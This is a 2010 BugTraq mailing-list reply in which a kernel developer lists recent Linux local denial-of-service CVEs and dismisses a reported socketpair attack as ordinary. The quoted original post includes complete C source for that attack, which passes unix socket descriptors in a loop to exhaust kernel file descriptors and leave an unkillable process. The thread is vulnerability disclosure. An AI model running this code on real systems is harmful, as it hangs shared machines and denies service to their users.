BugTraq
Re: [Full-disclosure] Simple kernel attack using socketpair. easy, 100% reproductiblle, works under guest. no way to protect :( Nov 26 2010 04:12PM
Dan Rosenberg (dan j rosenberg gmail com)
It's funny to me that this should get special attention over any of
the several dozen local DoS vulnerabilities that have been made public
this year, starting with:

CVE-2010-2954: NULL pointer dereference in IRDA
CVE-2010-2960: NULL pointer dereference in keyctl
CVE-2010-3066: NULL pointer dereference in io_submit_one()
CVE-2010-3080: double free in oss
CVE-2010-3086: kernel panic in futex handling
CVE-2010-3442: non-exploitable heap corruption in sound/core
CVE-2010-4163: OOM-killer invocation in block layer
CVE-2010-4164: kernel panic in block layer
CVE-2010-4175: out-of-bounds read in RDS
CVE-2010-4161: deadlock in socket filters
CVE-2010-4243: 64-bit OOM trigger

The fix for this one is already committed or in the process of being
worked on, if it's indeed a separate issue from the similar unix
socketpair issue that was reported a couple days ago
(http://marc.info/?l=linux-kernel&m=129055087923940&w=2), which is
unclear at this time.

In short: nothing especially out of the ordinary to see here.

-Dan

On Fri, Nov 26, 2010 at 9:58 AM, Key Night <key.night (at) googlemail (dot) com [email concealed]> wrote:
> Simple kernel attack using socketpair. easy, 100% reproductiblle, works
> under guest. no way to protect :(
>
> Simple kernel attack using socketpair. easy, 100% reproductiblle,
> works under guest. no way to protect :(
>
>
>
> See source attached.
>
> Process become in state 'Running' but not killalble via kill -KILL.
>
> eat 100% CPU, eat all available internal file descriptors in kernel :(
>
> --
> Segmentation fault
>
>
> #include <sys/socket.h>
> #include <sys/un.h>
>
> static int send_fd (int unix_fd, int fd)
> {
> struct msghdr msgh;
> struct cmsghdr *cmsg;
> char buf[CMSG_SPACE (sizeof (fd))];
> memset (&msgh, 0, sizeof (msgh));
>
>
> memset (buf, 0, sizeof (buf));
>
> msgh.msg_control = buf;
> msgh.msg_controllen = sizeof (buf);
>
> cmsg = CMSG_FIRSTHDR (&msgh);
> cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
> cmsg->cmsg_level = SOL_SOCKET;
>
>
> cmsg->cmsg_type = SCM_RIGHTS;
>
> msgh.msg_controllen = cmsg->cmsg_len;
>
> memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
> return sendmsg (unix_fd, &msgh, 0);
> }
>
> int main ()
> {
>
> int fd[2], ff[2];
>
> int target;
> if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
> return 1;
> for (;;)
> {
> if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
> return 2;
> send_fd (ff[0], fd[0]);
> send_fd (ff[0], fd[1]);
>
>
> close (fd[1]);
> close (fd[0]);
> fd[0] = ff[0];
> fd[1] = ff[1];
> }
> }
>
> Source: http://lkml.org/lkml/2010/11/25/8
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus